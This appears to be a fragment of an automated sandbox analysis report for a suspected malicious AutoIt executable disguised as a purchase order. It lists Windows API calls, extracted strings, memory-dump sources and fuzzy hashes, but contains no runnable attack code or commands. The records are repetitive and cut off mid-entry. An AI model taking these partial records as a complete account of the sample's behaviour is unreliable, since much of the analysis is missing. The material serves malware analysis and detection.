                                                                                                                                                                                                      • Instruction Fuzzy Hash: F51159B2510209AFDB04DFB8CC45AFA7BA8FB08304F040A2DF955E2250E778E851DB64
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00469699
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004696A8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                                                                                                      • Opcode ID: c86d9eb9ffc1d426f222cee146d04e483dea2355f225b7c887d0f75077ba98af
                                                                                                                                                                                                      • Instruction ID: 079201cb152505e4b2648a84ffa414ebecf0272cf0d9648ea889d6aacb27be9d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c86d9eb9ffc1d426f222cee146d04e483dea2355f225b7c887d0f75077ba98af
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F118CB1500208ABEF105F64DC40EEB3B6EEB05378F50472AF965932E0E7B9DC51976A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004452D5
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004452F4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                                      • Opcode ID: 5f1f7562660535dd0787f45482b6577770730e5d2864a594714d20415fe06af5
                                                                                                                                                                                                      • Instruction ID: 4aa882214851b6137429ad84dca8c1b776e6d3ce1b64bb11d89768716e185c9b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f1f7562660535dd0787f45482b6577770730e5d2864a594714d20415fe06af5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F11E675901614ABEF10DF98DD04F9E77B8AB06B50F040067ED01E72A6D3B4ED04CBA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00454DF5
                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00454E1E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                                                      • Opcode ID: c41af664caa84992bae27b1839a8a9f44ed4492246e170a5140c86a16522e1f5
                                                                                                                                                                                                      • Instruction ID: a2b902033b2b272dcdd8de091da7bffdf87fca83f2330df1588581490dfa76f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c41af664caa84992bae27b1839a8a9f44ed4492246e170a5140c86a16522e1f5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E511CE70501221BADB248F51CC89EFBFBA8FB4635AF10822BF9054A241D3785989D6F4
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004337A7
                                                                                                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 0043388E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                      • String ID: (L
                                                                                                                                                                                                      • API String ID: 3761405300-64732604
                                                                                                                                                                                                      • Opcode ID: a40f8e116bfc696f368d88831b551c28d1c3d89a3c6c6fa4c88d08e655525652
                                                                                                                                                                                                      • Instruction ID: 96f49d47f233934f97ff6fc98e2702f1e7ee9d77956f56a4b685f7c9de796b82
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a40f8e116bfc696f368d88831b551c28d1c3d89a3c6c6fa4c88d08e655525652
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6821F0B5580304DBE780DF59F985E513BB5BB48314F10983AE9098B3A1E3F4A990CF4D
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0045A84E
                                                                                                                                                                                                      • htons.WSOCK32(00000000,?,00000000), ref: 0045A88B
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: htonsinet_addr
                                                                                                                                                                                                      • String ID: 255.255.255.255
                                                                                                                                                                                                      • API String ID: 3832099526-2422070025
                                                                                                                                                                                                      • Opcode ID: 247d1f042c941e4ceba1292f70c7cc75ae078602170ffbaf1e7425dee2c373b8
                                                                                                                                                                                                      • Instruction ID: 33c0523eded20f95c2541e34a1306b90952281821fa3487106dbad58873c6196
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 247d1f042c941e4ceba1292f70c7cc75ae078602170ffbaf1e7425dee2c373b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7012674600304ABCB10EF68D886FADB364EF04315F10866BF912A73D2D739E819875A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0043B7EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                      • Opcode ID: b4fa11f08299f1cb44719dd08ff76bd0fd71c5c0fb2f2fe97a62c0fd4fd5e9ae
                                                                                                                                                                                                      • Instruction ID: faa06fab09b860605fa71cac64a851d916af7b13232032877203d1f3c0118a4b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4fa11f08299f1cb44719dd08ff76bd0fd71c5c0fb2f2fe97a62c0fd4fd5e9ae
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9601F571A00114EBCB04EBA4DC52AFE7369EF49354B10072EF461632D2EB78590887E8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 0043B6EB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                      • Opcode ID: 2dd0c978073301e0624ed0918eab732d0afd5455037bea25531d9f7abd34a921
                                                                                                                                                                                                      • Instruction ID: b8f5d47413315d950295729a5b1110aeefbe7e91dcf1101fa693de6a23fb402e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2dd0c978073301e0624ed0918eab732d0afd5455037bea25531d9f7abd34a921
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3014471A41104ABCB05EBA5D953BFF73A89F09344F10112EB502732D2DB685E1897FE
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 0043B76C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                      • Opcode ID: 784a9185c894f4c43e64d3d9a2b7014492d6470fd15c5f471a52d0cb84cfd9fc
                                                                                                                                                                                                      • Instruction ID: c3be138fd8a8966307237f1d2d4df2bf089ee9f861b5d3441c339aeace00059b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 784a9185c894f4c43e64d3d9a2b7014492d6470fd15c5f471a52d0cb84cfd9fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D018FB1A41104EACB00E7A4DA52BFE73A8DB49348F10012FB901B32D2DB685E0987FD
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                                                                                      • String ID: "L
                                                                                                                                                                                                      • API String ID: 3494438863-1021959943
                                                                                                                                                                                                      • Opcode ID: 459589bf01f1e6131b3d3ec32ae4130910a5340231ecd4781b19d2833b58d21b
                                                                                                                                                                                                      • Instruction ID: eceeb894ac627c810ad756cc3828aaa3408dd9ea78c7f78f9365c7f2dbc213ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 459589bf01f1e6131b3d3ec32ae4130910a5340231ecd4781b19d2833b58d21b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1F028713183219AF3149F59BD40EA667D4E740724F50406FF201CA294EBF8C8818A9C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 00404048
                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(00000000,0000000E,004467E9,00000063,00000000,75A90280,?,?,00403EE1,?,?,000000FF), ref: 004741B3
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: EnumImageLoadNamesResource
                                                                                                                                                                                                      • String ID: >@
                                                                                                                                                                                                      • API String ID: 1578290342-3542666865
                                                                                                                                                                                                      • Opcode ID: bab34c3f728c8b386ba82047d6e39d7d497ddc0bf13f65d9d22f117b650463ae
                                                                                                                                                                                                      • Instruction ID: e4973a436c4eec6c210a25eda4c59efc3669ea1aa6e7713dab2b8f7e5e7bc754
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bab34c3f728c8b386ba82047d6e39d7d497ddc0bf13f65d9d22f117b650463ae
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDF0627164031077E2205B16EC4AFD63B59E746BB5F104526F314A61E1D3F49080879C
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ClassName_wcscmp
                                                                                                                                                                                                      • String ID: #32770
                                                                                                                                                                                                      • API String ID: 2292705959-463685578
                                                                                                                                                                                                      • Opcode ID: 19885046d328be14b13736f514f01db7c9f633ee2f0e495d3f61fe0272f84085
                                                                                                                                                                                                      • Instruction ID: 5da36549c17edabc345c5b580b635295ffd76962587edd0bfd7ecaf78b42af47
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19885046d328be14b13736f514f01db7c9f633ee2f0e495d3f61fe0272f84085
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8E09B7760422427D7109B96AC45EC7FB6CAB51764F01006BB905D3191E674A64187D8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0043A63F
                                                                                                                                                                                                        • Part of subcall function 004213F1: _doexit.LIBCMT ref: 004213FB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Message_doexit
                                                                                                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                                                                                                      • Opcode ID: 1ba854038b8473aa083648953f2f752e322ff89e2bed0cc3a395ee1f50964944
                                                                                                                                                                                                      • Instruction ID: 5d97c885ed2fb4aad5e724718862caed6ad4245b0840fc8da154a937ba3d52f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ba854038b8473aa083648953f2f752e322ff89e2bed0cc3a395ee1f50964944
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53D02B313C032833D21436993C17FCA36488B14B55F14043BBF0CA51E249EED58002ED
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 0047ACC0
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0047AEBD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFreeLibrarySystem
                                                                                                                                                                                                      • String ID: WIN_XPe
                                                                                                                                                                                                      • API String ID: 510247158-3257408948
                                                                                                                                                                                                      • Opcode ID: f02dee9907a3410a0ad3bfb725c55c2b44904c0d5ea618dd59c9d693f90e6aae
                                                                                                                                                                                                      • Instruction ID: f0b89022b82c59c2a06aa5e0fa401b0a8aeab976c9a9b17577a1c73a37eb26dc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f02dee9907a3410a0ad3bfb725c55c2b44904c0d5ea618dd59c9d693f90e6aae
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFE06DB0C00209EFCB16DBA5D9449ECB7B8AB88301F14C097E006B2260CB745A89DF2B
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004686E2
                                                                                                                                                                                                      • PostMessageW.USER32(00000000), ref: 004686E9
                                                                                                                                                                                                        • Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
